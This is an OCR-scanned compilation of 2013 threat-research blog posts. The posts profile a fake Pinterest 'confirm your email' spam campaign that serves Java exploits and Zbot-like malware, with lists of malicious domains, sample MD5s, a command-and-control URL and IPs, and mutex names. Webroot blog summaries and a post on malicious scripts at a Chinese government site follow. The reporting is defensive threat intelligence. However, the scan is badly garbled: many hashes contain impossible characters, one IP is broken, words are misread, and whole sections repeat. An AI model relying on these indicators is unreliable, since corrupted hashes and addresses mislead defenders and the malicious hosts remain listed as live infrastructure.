originalpizzaplus.ca 
Originalpizzaplus.com 

papak.ca 

pccreature.com 

pixieglitztutus.com 

pizzapluswindsor.ca 
saltlakecityutahcommercialrealestate.com 


The following malicious MD5s are known to have phoned back to the same IP on the 
22nd of September, 2013: 

MD5: 5d14ee5800fc3c73e4d40567044c4149 
MD5: bdc2ac48921914f25d1a3a164266cebc 
MD5: a0b2ba75ba7ad7ad5a5b87a966fddb07 
MD5: 31c3eae608247c2901d64643d5626b1f 
MD5: 3cff9bba085254f2a524207a1388b015 
MD5: b59743a3b128c9676548510627db4ac5 
MD5: 53004bb63d32792c9bc1b8b26db0f197 
MD5: b59743a3b128c9676548510627db4ac5 
MD5: 53004bb63d32792c9bc1b8b26db0f197 
MD5: 94e7cf26589baac1d47d6834e6375a62 
MD5: 38461b4537fb269b2142e7fbac16375b 
MD5: 041e9ccce8809371b07f0ac1c4d02b33 
MD5: 868cf2c7af8863aebbaeb42c1b404b36 
MD5: 7ec71f392dfc98336808ca6e31f25969 
MD5: 6792b758ea961f58ad5b2fleb96a648a 
MD5: 33550cef428cad48ba776eal109fe1936 
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MD5: af84138bc55192ce722582def2f05200 
MD5: 170524f3457d1fa681cc5dafbcc86199 
MD5: e3af059e42b82b8658f3d05043a5a213 
MD5: 4724783ae2c928b40dd2cOac6d85cbc4 
MD5: 9b8d87230ee7f553e8a9011a37ca699e 
MD5: e4d63169ddac5e34fe000dc21c88682f 
MD5: 5f777af07c79369310dff97d04c026cd 
MD5: 200badc2e35ce57fle511aea7322e207 
MD5: 93fe170f26d99aea52b30b74afdf96bc 
MD5: d06a0cc046e99496ada5591d9f457fcl 
MD5: 6f857be5377a/543858aacefea6fla30 
MD5: 92ed463b3c38f2c951c3acd78e7a2df3 
MD5: 8f01cd5ddd6e599e7 9ddcefbff9c0891 


Detection rate for a sample served exploit from the Pinterest themed campaign: 
[1]MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners 
as HEUR:Exploit.Java.CVE-2012-1723.gen 


Upon successful client-side exploitation, the campaign drops two malware samples on 
the affected hosts. 


Detection rate for the first dropped sample: 
[2]MD5: ae840d6ac2f02b4bff85182d2c72a053 - detected by 6 out of 48 antivirus scanners as 
UDS:DangerousObject.Multi.Generic 


Once executed, it phones back to the following C &C: 
78.140.131.151/uploading/id=REDACTED &u=PSEUDO _RANDOM _CHARACTERS 


The following malicious MD5s are also known to have phoned back to the following C 
&C IP (78.140.131.151) in the past: 

MD5: ca783e0964e7dcb91fcc2a2ff4b8058f 
MD5: d02b0e60f94d718fcal9893f13dbd93e 
MD5: 3618032d05c12e6d25aa4b7bc9086e06 
MD5: 20777b8e6362f8775060fc4fdb191978 
MD5: 5a1fb639f5dd97b62b5cf79c84d47 9f6 
MD5: 30f8d972566930c103f9edb7f9bd699e 
MD5: 701labeefd5c9e7c21e3cbe28cc5e71la 
MD5: bbb57f1a5004b6adc016c0c9e92add19 
MD5: cca6b7fae6678c4b17f21b2ed4580404 
MD5: Odecc3f58519c587949dff871fccba5e 
MD5: 1b618f9138adbd6b4bf7125c7e6a97aae 
MD5: 1e4451c19f07ef6bde87ffbcecc5afb3 
MD5: e92297e402fcd03f06c94fe52985a3e9 
MD5: 818e329757630bccc9536151f533fad2 
MD5: 79e8677f857531118e61fa9238287acb 
MD5: de8ef966e7e5251b642540e715d673a6 
MD5: 9be83dc4b829ffba26029b173b36237d 
MD5: c9b3f7888faa393ee14815494a311684 
MD5: d90058b75b8730f9d6bf94a845b3dfda 
MD5: e14b4290eec92ce6cd3e0349c17bc062 
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MD5: 6d5f5419f6a116f4283ae58516ff90al 

MD5: d0587b6e83a70798077e2938af66c50c 
MD5: 12449febf7efed7bceade5720c8f635d 

MD5: 992fc7370b39553ebcb3c03c23c15517 
MD5: 1c198a6b80b1dcf280db30133c26d479 
MD5: 7bb85f458b6b8a0bc98d47447b44c5b6 
MD5: 1a3679c0c7c42781d9ee5b6987efa726 
MD5: 7d21915fc425b3545c8e156116f91e00 


Detection rate for the second dropped sample: 


[3]MD5: 83bbe52c8584a5dab07allecc5aaf090 - detected by 3 out of 48 antivirus scanners 


as Trojan-Spy.Win32.Zbot.qgje; Trojan.Backdoor.RV 


Once executed it starts listening on ports 7867 and 1653. 


The sample then creates the following Mutexes on the affected hosts: 


Local\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Local\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Local\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Local\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Local\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Local\ {911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A } 
Global\ {2E06BA86-8AE7-D5EB-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 
Global\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
Global\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Global\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Global\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Global\ {BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A } 
Global\ {EFF344E9-7488-141E-11EB-B06D3016937F } 
Global\ {EFF344E9-7488-141E-75EA-B06D5417937F } 
Global\ {EFF344E9-7488-141E-4DE9-B06D6C14937F } 
Global\ {EFF344E9-7488-141E-65E9-B06D4414937F } 
Global\ {EFF344E9-7488-141E-89E9-B06DA814937F } 
Global\ {EFF344E9-7488-141E-BDE9-B06D9C14937F } 
Global\ {EFF344E9-7488-141E-51E8-B06D7015937F } 
Global\ {EFF344E9-7488-141E-81E8-B06DA015937F } 
Global\ {EFF344E9-7488-141E-FDE8-BO6DDC15937F } 
Global\ {EFF344E9-7488-141E-ODEF-B06D2C12937F } 
Global\ {EFF344E9-7488-141E-5DEF-B06D7C12937F } 
Global\ {EFF344E9-7488-141E-95EE-B06DB413937F } 
Global\ {EFF344E9-7488-141E-F1EE-B06DD013937F } 
Global\ {EFF344E9-7488-141E-89EB-B06DA816937F } 
Global\ {EFF344E9-7488-141E-F9EF-B06DD812937F } 
Global\ {EFF344E9-7488-141E-E5EF-B06DC412937F } 
Global\ {EFF344E9-7488-141E-ODEE-B06D2C13937F } 
Global\ {EFF344E9-7488-141E-09ED-B06D2810937F } 
Global\ {EFF344E9-7488-141E-51EF-B06D7012937F } 
Global\ {EFF344E9-7488-141E-35EC-B06D1411937F } 
Global\ {EFF344E9-7488-141E-55EF-B06D7412937F } 
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Global\ {DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A } 
Global\ {2E1C200D-106C-D5F1-DBC9-BE58FA349D4A } 
MPSWabDataAccessMutex 

MPSWABOlIkStoreNotifyMutex 


Once executed, it also drops MD5: 2da7bbc5677313c2876b571b39edc7cf and MD5: 
83bbe52c8584a5dab07alleccSaaf090 on the affected hosts. 


It then phones back to the following C &C (command and control servers): 
99.157.164.179 

174.76.94.24 

99.60.68.114 

217.35.75.232 

184.145.205.63 

99.60.111.51 

207.47.212.146 

108.240.232.212 

107.193.222.108 


We've already seen (some of) these C &C IPs in the following profiled malicious cam- 
paign "[4]Spamvertised Facebook ’You have friend suggestions, friend requests and photo 
tags’ Themed Emails Lead to Client-side Exploits and Malware". 


This post has been reproduced from [5]Dancho Danchev’s blog . Follow him 
[6Jon Twitter. 


1. 
2. 
3. 
4. http: //ddanchev. blogspot .com/2013/09/spamvertised-facebook-you-have-friend.html 

5, heep://ddanchev. blogspot com) 

6, http: //ewitter.con/danchodanched 


9.10.2 Fake Pinterest Don’t forget to confirm your email!’ Themed Emails Serve 
Client-side Exploits and Malware (2013-10-01 21:12) 
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Vinterest 
We just want to make sure we got your email right. Please let " 
us ae nid ? Confirm Email 


Happy pinning! 


Cybercriminals have just launched yet another massive spam campaign, this time at- 
tempting to trick Pinterest users into thinking that they’ve received an email confirmation 
request. In reality though, once users click on the links found in the malicious emails, they’re 
automatically exposed to client-side exploits, with the campaign dropping two malware 
samples on the affected hosts once a successful client-side exploitation takes place. 


Let’s dissect the campaign, expose the malicious portfolio of domains involved in it, pro- 
vide MD5s of the served malware as well as a sample exploit, and provide actionable 
(historical) intelligence regarding related malicious activities that have been taking place 
using same infrastructure that’s involved in the Pinterest campaign. 


Spamvertised malicious URL: 


boxenteam.com/hathaway/index.html?emailmpss/PSEUDO _RANDOM _CHARACTERS 


Attempts to load the following malicious scripts: 
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theodoxos.gr/hairstyles/defiling.js 
web29.webbox11.server-home.org/volleyballs/cloture.js 
knopflos-combo.de/subdued/opposition.js 


Sample client-side exploits serving URL: 


pizzapluswindsor.ca/topic/latest-blog-news.php 


Malicious domain name reconnaissance: 


pizzapluswindsor.ca - 50.116.6.57; 174.140.169.145 


Responding to the same IP (50.116.6.57) are also the following malicious domains part 
of the campaing’s infrastructure: 


pizzapluswindsor.ca 
plainidea.com 
procreature.com 
poindextersonpatrol.com 


pixieglitztutus.com 


Known to have responded to the second IP (174.140.169.145) are also the following 
malicious domains: 


lesperancerenovations.com 
louievozza.com 
louvozza.com 
lv-contracting.com 
Ivconcordecontracting.com 
mcbelectrical.ca 


oliviagurun.com 
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onecable.ca 


onlyidea.com 


originalpizzaplus.ca 


Originalpizzaplus.com 


papak.ca 


pccreature.com 


pixieglitztutus.com 


pizzapluswindsor.ca 


saltlakecityutahcommercialrealestate.com 


The following malicious MD5s are known to have phoned back to the same IP on the 
22nd of September, 2013: 


MD5 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


5d14ee5800fc3c73e4d40567044c4149 


bdc2ac48921914f25d1a3a164266cebc 


a0b2ba75ba7ad7ad5a5b87a966fddb07 


31c3eae608247c2901d64643d5626b1f 


3cff9bba085254f2a524207a1388b015 


b59743a3b128c9676548510627db4ac5 


53004bb63d32792c9bc1b8b26db0f197 


b59743a3b128c9676548510627db4ac5 


53004bb63d32792c9bc1b8b26db0f197 


94e7cf26589baac1d47d6834e6375a62 


38461b4537fb269b2142e7fbac16375b 


041e9ccce8809371b07f0ac1c4d02b33 


868cf2c7af8863aebbaeb42c1b404b36 


7ec71f392dfc98336808ca6e31F25969 
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MD5: 6792b758ea961f58ad5b2fleb96a648a 
MD5: 33550cef428cad48ba776ea109fe1936 
MD5: af84138bc55192ce722582def2f05200 
MD5: 170524f3457d1fa681cc5dafbcc86199 
MD5: e3af059e42b82b8658f3d05043a5a213 
MD5: 4724783ae2c928b40dd2cOac6d85cbc4 
MD5: 9b8d87230ee7f553e8a9011a37ca699e 
MD5: e4d63169ddac5e34fe000dc21c88682f 
MD5: 5f777af07c79369310dff97d04c026cd 
MD5: 200badc2e35ce57fle511aea7322e207 
MD5: 93fe170f26d99aea52b30b74afdf96bc 
MD5: d06a0cc046e99496ada5591d9f457fcl 
MD5: 6f857be5377a7543858aacefea6fla30 
MD5: 92ed463b3c38f2c951c3acd78e7a2df3 


MD5: 8f01cd5ddd6e599e7 9ddcefbff9c0891 


Detection rate for a sample served exploit from the Pinterest themed campaign: 


[1]MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners 
as HEUR:Exploit.Java.CVE-2012-1723.gen 


Upon successful client-side exploitation, the campaign drops two malware samples on 
the affected hosts. 


Detection rate for the first dropped sample: 


[2]MD5: ae840d6ac2f02b4bff85182d2c72a053 - detected by 6 out of 48 antivirus scan- 
ners as UDS:DangerousObject.Multi.Generic 
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Once executed, it phones back to the following C &C: 


78.140.131.151/uploading/id=REDACTED &u=PSEUDO _RANDOM _CHARACTERS 


The following malicious MD5s are also known to have phoned back to the following C 
&C IP (78.140.131.151) in the past: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


ca783e0964e7dcb9l1fcc2a2ff4b8058f 


d02b0e60f94d718fcal9893f13dbd93e 


3618032d05c12e6d25aa4b7bc9086e06 


20777b8e6362f8775060fc4fdb191978 


5al1fb639f5dd97b62b5cf79c84d479f6 


30f8d972566930c103f9edb7f9bd699e 


701labeefd5c9e7c21e3cbe28cc5e71a 


bbb57f1a5004b6adc016c0c9e92add19 


cca6b7fae6678c4b17f21b2ed4580404 


Odecc3f58519c587949dff871fccba5e 


1b18f9138adbd6b4bf7125c7e6a97aae 


1e4451c19f07ef6bde87ffbcecc5afb3 


e€92297e402fcd03f06c94fe52985a3e9 


818e329757630bccc9536151f533fad2 


79e8677f857531118e61fa9238287acb 


de8ef966e7e5251b642540e715d673a6 


9be83dc4b829ffba26029b173b36237d 


C9b3f7888faa393ee14815494a311684 


d90058b75b8730f9d6bf94a845b3dfda 


e€14b4290eec92ce6cd3e0349c17bc062 
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MD5: 6d5f5419f6a116f4283ae58516ff90al 

MD5: d0587b6e83a70798077e2938af66c50c 
MD5: 12449febf7efed7bceade5720c8f635d 

MD5: 992fc7370b39553ebcb3c03c23c15517 
MD5: 1c198a6b80b1dcf280db30133c26d479 
MD5: 7bb85f458b6b8a0bc98d47447b44c5b6 
MD5: 1a3679c0c7c42781d9ee5b6987efa726 


MD5: 7d21915fc425b3545c8e156116f91e00 


Detection rate for the second dropped sample: 


[3]MD5: 83bbe52c8584a5dab07allecc5aaf090 - detected by 3 out of 48 antivirus scan- 
ners as Trojan-Spy.Win32.Zbot.qgje; Trojan.Backdoor.RV 


Once executed it starts listening on ports 7867 and 1653. 


The sample then creates the following Mutexes on the affected hosts: 
Local\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 

Local\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 

Local\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 

Local\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 

Local\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 

Local\ {911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A } 

Global\ {2E06BA86-8AE7-D5EB-DBC9-BE58FA349D4A } 

Global\ {BOB9FAFD-CA9C-4B54-DBC9-BE58FA349D4A } 


Global\ {BOB9FAFC-CA9D-4B54-DBC9-BE58FA349D4A } 
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Global\ {D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A } 
Global\ {D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A } 
Global\ {OBB5ADEF-9D8E-F058-DBC9-BE58FA349D4A } 
Global\ {BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A } 
Global\ {EFF344E9-7488-141E-11EB-B06D3016937F } 
Global\ {EFF344E9-7488-141E-75EA-B06D5417937F } 
Global\ {EFF344E9-7488-141E-4DE9-B06D6C14937F } 
Global\ {EFF344E9-7488-141E-65E9-B06D4414937F } 
Global\ {EFF344E9-7488-141E-89E9-B06DA814937F } 
Global\ {EFF344E9-7488-141E-BDE9-B06D9C14937F } 
Global\ {EFF344E9-7488-141E-51E8-B06D7015937F } 
Global\ {EFF344E9-7488-141E-81E8-B06DA015937F } 
Global\ {EFF344E9-7488-141E-FDE8-BO6DDC15937F } 
Global\ {EFF344E9-7488-141E-ODEF-B06D2C12937F } 
Global\ {EFF344E9-7488-141E-5DEF-B06D7C12937F } 
Global\ {EFF344E9-7488-141E-95EE-B06DB413937F } 
Global\ {EFF344E9-7488-141E-F1EE-B06DD013937F } 
Global\ {EFF344E9-7488-141E-89EB-B06DA816937F } 
Global\ {EFF344E9-7488-141E-F9EF-B06DD812937F } 
Global\ {EFF344E9-7488-141E-E5EF-B06DC412937F } 
Global\ {EFF344E9-7488-141E-ODEE-B06D2C13937F } 
Global\ {EFF344E9-7488-141E-09ED-B06D2810937F } 
Global\ {EFF344E9-7488-141E-51EF-B06D7012937F } 
Global\ {EFF344E9-7488-141E-35EC-B06D1411937F } 


Global\ {EFF344E9-7488-141E-55EF-B06D7412937F } 
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Global\ {DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A } 
Global\ {2E1C200D-106C-D5F1-DBC9-BE58FA349D4A } 
MPSWabDataAccessMutex 


MPSWABOlIkStoreNotifyMutex 


Once executed, it also drops MD5: 2da7bbc5677313c2876b571b39edc7cf and MD5: 
83bbe52c8584a5dab07alleccSaaf090 on the affected hosts. 


It then phones back to the following C &C (command and control servers): 
99.157.164.179 

174.76.94.24 

99.60.68.114 

217.35:7 5.232 

184.145.205.63 

99.60.111.51 

207.47.212.146 

108.240.232.212 


107.193.222.108 


We've already seen (some of) these C &C IPs in the following profiled malicious cam- 
paign "[4]Spamvertised Facebook ’You have friend suggestions, friend requests and photo 
tags’ Themed Emails Lead to Client-side Exploits and Malware". 


Updates will be posted as soon as new developments take place. 


1. https: //wuw.virustotal .com/en/file/bd7cOf52td7d7e9b20ab9e8F 13ac114243a4f09433f484f8fbc3b51¢7c44650d/analys 
2. https: //ww. virustotal . com/en/file/2dbc3ad0626cbb577ec319b7a62b07b6899F fa7 4ad98309a6390623f 2cd9cdd2/analys 
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3. https://www.virustotal .com/en/file/db9345188d8b913b7abd5ea998£67 fb7d4fb7aa054e48c52641e795d9b3c7e28/analys 


is/1380650677/ 


4. http://ddanchev. blogspot .com/2013/09/spamvertised-facebook- you-have-friend. html 


9.10.3 Summarizing Webroot’s Threat Blog Posts for September (2013-10-02 16:10) 


Webroot Threat Blog 
Internet Security Threat Updates & Insights 


Search 


Our Extended 
Community 


Lf te in Bis 


Top Authors 


ie) 
@ Dancho Danchev 


A Nathan Cother 


l Grayson Milbourne 


wg Tyler Moffitt 
re | Brenden Vaughan 


Looking For Support? 
The Webroot Community is 
happy to answer your 
questions, but @ you're looking 
for our official support 
department, please open a 


READ WATCH CONNECT DISCUSS 
BE eee ote, 


“T-Mobile MMS message has arrived’ themed 
emails lead to malware 


October 2nd, 2013 by Dancho Danchev 


A circulating malkious spam campaikjn atiempts to trick T-Mobile customers into thinking thal they've received a 


password-protected MMS. However, once guilible and socially engineered users execute the maiicious atiachment 


they automat ally cor the confidentiality and integrity of their PCs, allowing the cybercriminats behind the 


Campaign to gain complete controt of their PCs 


CONTINUE READING » 


Posted in. Botnet activity, mal-effects, malware, social engineering, spam, Threat Research, Trojans 
Tagged: botnet Botnets cybercrime FakeEmai MalidousEmail MalidousSoQware maiware Rogue Email 
security sociaiengineering spam SpamCampaign Spanwertised T-Mobile 


ThreatVlog Episode 7: Phishing schemes are on 
the rise 


October 1st, 2013 by Grayson Milbourne and Richard Melick 


In this edition of the Webroot ThreatViog, Grayson Mibourne talks about the rise of digital phisihing schemes on the 


nternet and how they affect the victims. He then unveils a brand ne t from Webroot that ts designed to keep 


users protected from websites that are malicious in nature that could be trying to capture credit card and other 


personal information 


CONTINUE READING » 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for September, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild 
02. [4]Scammers pop up in Android’s Calendar App 
03. [5]Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the 


wild 
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04. [6]Managed Malicious Java Applets Hosting Service Spotted in the Wild 

05. [7J]Affiliate network for mobile malware impersonates Google Play, tricks users into 
installing premium-rate SMS sending rogue apps 

06. [8]419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis 
themed scams 

07. [9]Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the 
destruction of the SIM card on request 

08. [10]Yet another ‘malware-infected hosts as anonymization stepping stones’ service 
offering access to hundreds of compromised hosts spotted in the wild 

09. [11]Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based 
DIY DoS tool 

10. [12]Cybercriminals sell access to tens of thousands of malware-infected Russian hosts 
11. [13]Spamvertised “FDIC: Your business account” themed emails serve client-side exploits 
and malware 

12. [14]Cybercriminals experiment with Android compatible, Python-based SQL injecting 
releases 

13. [15]Newly launched E-shop offers access to hundreds of thousands of compromised 
accounts 

14. [16]DIY commercial CAPTCHA-solving automatic email account registration tool available 
on the underground market since 2008 

15. [17]Yet another subscription-based stealth Bitcoin mining tool spotted in the wild 


This post has been reproduced from [18]Dancho Danchev’s blog . Follow him 
[19]on Twitter. 


1. http://www .webroot .com/blog 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3. 


ttp://www. webroot .com/blog/2013/09/06/diy-malicious-android-apk-generating-sensitive-information-steale 


spotted-wild/ 


4. http://www. webroot .com/blog/2013/09/09/scammers-pop-androids-calendar-app/ 
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. http://www.webroot .com/blog/2013/09/10/web-based-dns-amplification-ddos-attack-mode-supporting-php-script 


spotted-wild/ 


6. http: //www.webroot .com/blog/2013/09/11/managed-malicious- java-applets-hosting-service-spotted-wild/ 


7. http: //www.webroot .com/blog/2013/09/18/affiliate-network-mobile-malware-impersonates-google-play-tricks- 


sers-installing-premium-rate-sms-sending-rogue-apps/ 


8. http://www.webroot .com/blog/2013/09/18/419-advance-fee-fraudsters-abuse-cnns-email-feature-spread-syrian- 


crisis-themed-scams/ 


9. http://www.webroot .com/blog/2013/09/19/cybercriminals-offer-anonymous-mobile-numbers-sms-activation-video 


tape-destruction-sim-request/ 


10. ttp://www.webroot.com/blog/2013/09/20/yet-another-malware-infected-hosts-anonymization-stepping-stones 


service-offering-access-hundreds-compromised-hosts-spott 


11. ttp://www.webroot.com/blog/2013/09/20/cybercriminals-release-new- socks4socks5-malware- infected-hosts- 


ased-diy-dos-tool/ 


12. ttp://www.webroot.com/blog/2013/09/23/cybercriminals-sell-access-tens-thousands-malware-infected-russi 


13. http://www.webroot.com/blog/2013/09/23/spamvertised-fdic-business-account-themed-emails-server-client-s 


ide-exploits-malware/ 


14. ttp://www.webroot.com/blog/2013/09/24/cybercriminals-experiment-android-based-sql-injecting-python-bas 


15. hbhttp://www.webroot.com/blog/2013/09/25/newly-launched-e-shop-offers-access—hundreds-thousands-compromis 


16. http://www.webroot .com/blog/2013/09/27/diy-commercial-captcha-solving-automatic-email-account-registrat 


17. bttp://www.webroot .com/blog/2013/09/27/yet-another-subscription-based-stealth-bitcoin-mining-tool-spott 
18. 
19. 


9.11 November 


9.11.1 Summarizing Webroot’s Threat Blog Posts for October (2013-11-01 17:54) 


WEBROOT 


Webroot Threat Blog 


2 =f 


Our Extended Comenanrty 


Hcie 


Top Avthers 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for October, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


a 


01. [3]A peek inside a Blackhat SEO/cybercrime-friendly doorways management platform 

02. [4]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercrimi- 
nals with bulletproof hosting capabilities - part two 

03. [5]‘T-Mobile MMS message has arrived’ themed emails lead to malware 

04. [6]DDoS for hire vendor ‘vertically integrates’ starts offering TDoS attack capabilities 

05. [7]Commercially available Blackhat SEO enabled multi-third-party product licenses em- 
powered VPSs spotted in the wild 

06. [8]New cybercrime-friendly iFrames-based E-shop for traffic spotted in the wild 

07. [9]Cybercriminals offer soam-friendly SMTP servers for rent - part two 

08. [10]Newly launched VDS-based cybercrime-friendly hosting provider helps facilitate 
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fraudulent/malicious online activity 

09. [11]Fake ‘You have missed emails’ GMail themed emails lead to pharmaceutical scams 
10. [12]Compromised Turkish Government Web site leads to malware 

11. [13]Novice cyberciminals offer commercial access to five mini botnets 

12. [14]Spamvertised T-Mobile ‘Picture ID Type:MMS” themed emails lead to malware 

13. [15]Yet another Bitcoin accepting E-shop offering access to thousands of hacked PCs 
spotted in the wild 

14, [16]Malicious ‘FW: File’ themed emails lead to malware 

15. [17]Mass iframe injection campaign leads to Adobe Flash exploits 

16. [18]Rogue ads lead to the ‘Mipony Download Accelerator/FunMoods Toolbar’ PUA (Poten- 
tially Unwanted Application) 

17. [19]A peek inside the administration panel of a standardized E-shop for compromised 
accounts 

18. [20]U.K users targeted with fake ‘Confirming your Sky offer’ malware serving emails 

19, [21]New DIY compromised hosts/proxies syndicating tool spotted in the wild 

20. [22]Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application) 

21. [23]Fake ‘Scanned Image from a Xerox WorkCentre’ themed emails lead to malware 

22. [24]Fake ‘Important: Company Reports’ themed emails lead to malware 

23. [25]Cybercriminals release new commercially available Android/BlackBerry supporting 
mobile malware bot 

24. [26]Fake WhatsApp ‘Voice Message Notification/1 New Voicemail’ themed emails lead to 
malware 


This post has been reproduced from [27]Dancho Danchev’s blog . Follow him 
[28]on Twitter. 


1. http://www .webroot .com/blog 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
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ttp://www. webroot .com/blog/2013/10/01/peek- inside-blackhat-seo-friendly-doorways-management-platform/ 


4. http: //www.webroot .com/blog/2013/10/01/newly-launched-http-based-botnet-setup-service-empowers-novice-cyb 
5. http://www. webroot .com/blog/2013/10/02/t-mobile-mms-message-arrived-themed-emails-lead-malware/ 

6. http: //www.webroot .com/blog/2013/10/03/vertically-integrat ing-ddos-hire-vendor-spotted-wild/ 

7. bttp://www.webroot .com/blog/2013/10/04/commercially-available-blackhat-seo-enabled-multi-third-party-bhse 


o-product-licenses-empowered-vps-servers-spotted-wild/ 


8. http://www. webroot .com/blog/2013/10/04/new-cybercrime-friendly-iframes-based-e-shop-traffic-spotted-wild/ 


9. http://www. webroot .com/blog/2013/10/07/cybercriminals-offer-spam-friendly-smtp-servers-rent-part-two/ 


10. http://www.webroot.com/blog/2013/10/08/newly-launched-vds-based-cybercrime-friendly-hosting-provider-he 


lps-facilitate-fraudulentmalicious-online-activity/ 


11. http://www.webroot .com/blog/2013/10/09/fake-4-missed-emails-gmail-themed-emails-lead-pharmaceutical-sca 


12. http: //www.webroot .com/blog/2013/10/10/compromised-turkish-government-web-site-leads-malware/ 


13. http://www.webroot .com/blog/2013/10/11/novice-cyberciminals-offer-commercial-access-5-mini-botnets/ 


14. bbttp://www. webroot .com/blog/2013/10/14/spamvertised-t-mobile-picture-id-typemms-themed-emails-lead-mal 


15. http://www.webroot .com/blog/2013/10/16/yet-another-bitcoin-accepting-e-shop- offering-access-thousands- 


acked-pcs-spotted-wild/ 


16. http://www.webroot .com/blog/2013/10/16/malicious-fw-file-themed-emails-lead-malware/ 


17. http: //www.webroot .com/blog/2013/10/17/mass- iframe-injection-campaign-leads-adobe-flash-exploits/ 


18. http://www.webroot.com/blog/2013/10/18/rogue-ads-lead-mipony-download-accelerator-fun-moods-toolbar-pua 


potentially-unwanted-application/ 


http://www .webroot .com/blog/2013/10/22/rogue-ads- 1lead- ezdownloaderpro-pua-potentially-unwanted-applicat 


23. http://www.webroot.com/blog/2013/10/22/fake-scanned-image-xerox-workcentre-themed-emails-lead-malware/ 


24. http://www.webroot.com/blog/2013/10/24/fake-important-company-reports-themed-emails-lead-malware/ 

25. bttp://www.webroot .com/blog/2013/10/25/cybercriminals-release-new-commercially-available-androidblackbe 
26. http://www.webroot.com/blog/2013/10/28/fake-whatsapp-voice-message-notification1-new-voicemail-themed-e 
A TT, 


28. http://twitter.com/danchodanche 


9.11.2 Malicious Script Artifacts at China Green Dot Gov Dot Cn - A Reminiscence of 
Asprox’s Multi-Tasking Activities (2013-11-04 18:33) 


neighae"s* ot 


Malware artifacts, [1]Jabandoned mass iframe [2]embedded/injected campaigns, and low Qual- 
ity Assurance (QA) campaigns, continue popping up on everyone’s radar, raising eyebrows as 
to the extend of incompetence, possible evasive tactics, plain simple lack of applied QA when 
maintaining these campaigns, or the end of a campaign’s life cycle. 


What’s the value of assessing such a non-active campaign? Can the analysis provide 
any clues into related currently active malicious campaigns that typically for such type of 
Campaigns, continue relying on the same malicious infrastructure? But of course. 


Let’s assess the malicious artifacts at hxxp://chinagreen.gov.cn, connect them to the 
multi-tasking activities conducted on behalf of the Asprox botnet, as well as several spamver- 
tised malware campaigns circa 2010, and most importantly provide actionable intelligence 
on currently active campaigns that continue using the very same infrastructure for command 
and control purposes. 


Malicious scripts at China Green Dot Gov Dot CN: 

update.webserviceftp.ru/js.js - seen in "[3]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 

gdi.webserviceftp.ru/js.js - seen in "[4]Dissecting the Xerox WorkCentre Pro Scanned Docu- 
ment Themed Campaign" 

ver.webserivcekota.ru/js.js - seen in "[5]Dissecting the Xerox WorkCentre Pro Scanned Docu- 
ment Themed Campaign" 

batch.webserviceaan.ru/js.js - seen in "[6]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 
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nemohuildiin.ru/tds/go.php?sid=1 - seen in "[7]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign" 

parkperson.ru:8080/index.php?pid=13 - seen in "[8]Spamvertised Best Buy, Macy’s, Evite 
and Target Themed Scareware/Exploits Serving Campaign" 
nutcountry.ru:8080/index.php?pid=13 - seen in "[9]Spamvertised Best Buy, Macy’s, Evite and 
Target Themed Scareware/Exploits Serving Campaign" 


What’s so special about the spamvertised XeroxWorkCentre Pro campaign is that, back 
in 2010, it used to drop an Asprox sample, naturally phoning back to well known Asprox C &Cs 
at the time. 


nemohuildiin.ru is known to have responded to 31.31.204.61 and most recently to 5.63.152.19 


Known to have responded to the same IP (31.31.204.61) are also the following mali- 
cious domains: 
0O0O0sstd.com 
02143.ru 
03111991.ru 
0414.ru 
0424.ru 
050175.ru 
054ru.ru 
06140.ru 
0664346910.ru 
O801.ru 
08108.ru 
087474.ru 
08755.ru 
0925.ru 

Ogo.ru 
1-androds.ru 
